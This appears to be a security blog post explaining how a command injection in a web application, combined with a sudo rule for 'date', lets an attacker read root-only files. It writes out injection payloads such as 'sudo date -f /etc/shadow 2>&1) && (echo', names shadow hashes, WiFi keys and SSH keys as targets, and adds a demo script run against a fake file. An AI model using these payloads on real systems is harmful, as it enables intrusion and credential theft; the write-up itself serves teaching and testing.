Recently, I was testing an open source web application and stumbled on a command injection that executed as the www-data user (hopefully another blog post soon, once the vulnerability has been patched). To give a better idea of what I'm talking about, I created a demo web application with a similar vulnerability.
The payload in vulnparam is "id) && (echo". The id part is the command whose output is displayed on the page; the ") && (echo" part closes off the command the web application intended to run and effectively discards the rest of it. The injection itself is outside the scope of this post. Injecting id confirms I'm running as www-data. While enumerating the system for privilege escalation I ran "sudo -l" to list the commands www-data was allowed to run with sudo, and discovered something interesting.
date seemed like something worth exploring. The man page instantly revealed something promising: the -f, --file=DATEFILE option is documented as "like --date; once for each line of DATEFILE", meaning date will happily open any file and try to parse every line of it.
What happens if I set the file parameter to something that doesn't contain dates? Nothing at first, because date reports each line it can't parse as an "invalid date" error on standard error, and the web application only displayed standard output, haha. Once I realized that and redirected standard error to standard output with the payload "sudo date -f /etc/shadow 2>&1) && (echo", I hit pay dirt: the lines of /etc/shadow came back wrapped in date's error messages.
Since this was a web application on an Internet of Things (IoT) device, reading /etc/wpa_supplicant/wpa_supplicant.conf for the cleartext WiFi pre-shared key would be beneficial. On a more traditional engagement, being allowed to run date as root via sudo could be used to dump password hashes from /etc/shadow or to read root's SSH private keys. One caveat: a line that happens to parse as a valid date is printed as a date on standard output instead of being echoed back, so a file is not always recovered verbatim.
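The file-read primitive described above, as an added example that is not part of the original post. It builds a constructed stand-in for /etc/shadow or wpa_supplicant.conf (no real secrets), runs it through GNU date -f, and strips the "date: invalid date '...'" wrapper from each error line to recover the original content. The function names and the temporary file are my own; the example assumes GNU coreutils date and does not need sudo, since the point is the parsing behaviour, not the privilege boundary.

```shell
#!/bin/sh
# Added example (not the original post's code): show how GNU `date -f` echoes
# every line it cannot parse back to stderr, which is the file-read primitive
# the post abuses. The target file is a constructed stand-in, not a real
# /etc/shadow or wpa_supplicant.conf.
set -u

# Write a constructed target file and print its path.
# The last line is a valid date on purpose, to show the caveat: such lines
# are printed as dates on stdout and are not recovered verbatim.
make_target_file() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:$6$fakesaltfakesalt$fakehashfakehashfakehash:19000:0:99999:7:::
network={ ssid="corpnet" psk="NotARealWifiSecret" }
2021-05-04
EOF
    printf '%s\n' "$f"
}

# Read FILE through `date -f`. Each unparseable line comes back on stderr as
#   date: invalid date 'LINE'
# so merge stderr into stdout, keep only those lines, and strip the wrapper.
# LC_ALL=C keeps the quotes plain ASCII so the sed pattern is stable across
# locales (UTF-8 locales use curly quotes).
leak_file_via_date() {
    LC_ALL=C date -f "$1" 2>&1 \
        | sed -n "s/^date: invalid date '\(.*\)'$/\1/p"
}

# Number of lines recovered verbatim from FILE.
count_leaked_lines() {
    leak_file_via_date "$1" | wc -l | tr -d ' '
}

# Stand-alone demo: two of the three constructed lines come back, the valid
# date line does not.
if [ "${DATE_LEAK_DEMO:-1}" = "1" ]; then
    target=$(make_target_file)
    echo "Recovered $(count_leaked_lines "$target") line(s) from $target:"
    leak_file_via_date "$target"
    rm -f "$target"
fi
```

On the real target the same thing happens with "sudo date -f /etc/shadow 2>&1": date runs as root, opens the file, and hands every non-date line back inside an error message. Because date keeps going after a bad line rather than aborting, a whole file is returned in one invocation.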
I thought this was an interesting step towards privilege escalation and worth sharing. At the very least, it might be useful for a CTF...
Go forth and reign shells!
Good to know! I'll add this to the list!